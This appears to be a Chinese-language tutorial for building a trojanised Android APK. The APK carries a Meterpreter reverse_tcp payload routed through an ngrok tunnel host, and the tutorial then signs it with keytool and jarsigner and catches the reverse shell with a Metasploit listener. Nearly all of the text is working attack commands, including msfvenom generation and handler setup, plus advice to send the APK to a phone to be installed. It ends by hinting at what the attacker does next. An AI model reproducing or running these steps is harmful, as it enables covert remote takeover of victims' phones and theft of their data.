環境:
Kali Linux系統(https://www.kali.org/downloads/)
Metasploit
Ngrok Linux64位的端口轉發工具(https://www.ngrok.cc/)
1.在Kali Linux里面打開https://www.ngrok.cc,下載里面的Linux 64位的端口轉發工具,到Kali Linux桌面備用
然后小伙伴需要自己去https://www.ngrok.cc/注冊一個帳號來開通一個免費的隧道,用於接下來的端口映射。
2.設置隧道:
隧道協議選擇TCP的,本地端口輸入Kali Linux 的IP地址而端口號可以任意不要沖突就行了
設置好ngrok隧道之后就打開指定的sunny路徑運行端口轉發腳本。
./sunny clientid id
這個是端口轉發腳本成功運行的樣子
3. 用Metasploit生成載有惡意Payload的Android的apk並且簽名apk:
在Kali Linux里面打開一個新的窗口輸入
msfvenom -p android/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=11*** R > /root/Desktop/123.apk
執行下列命令簽名。首先使用密鑰工具創建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然后使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore 123.apk aliasname
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs 123.apk
如果你嫌上面的簽名apk的步驟很麻煩就直接在手機下載一個MT管理器進行對apk的簽名既方便又快捷。
4.使用Metasploit進行測試:
接下來啟動metasploit的監聽器。執行msfconsole打開控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.253.128(Kali的Linux內網IP)
SET LPORT 2222(隧道的端口號)
Exploit
然后將載有payload的APK發送到手機上安裝等待反彈shell
接受反彈shell成功
sessions查看反彈shell
sessions -i [ID]進行回話操作
剩下的大家應該知道怎么做了(眼神暗示)
注:如果你Kali linux的內網IP變了,可以直接在隧道修改成你的內網IP然后在set LHOST設置成你內網IP然后run監聽即可。











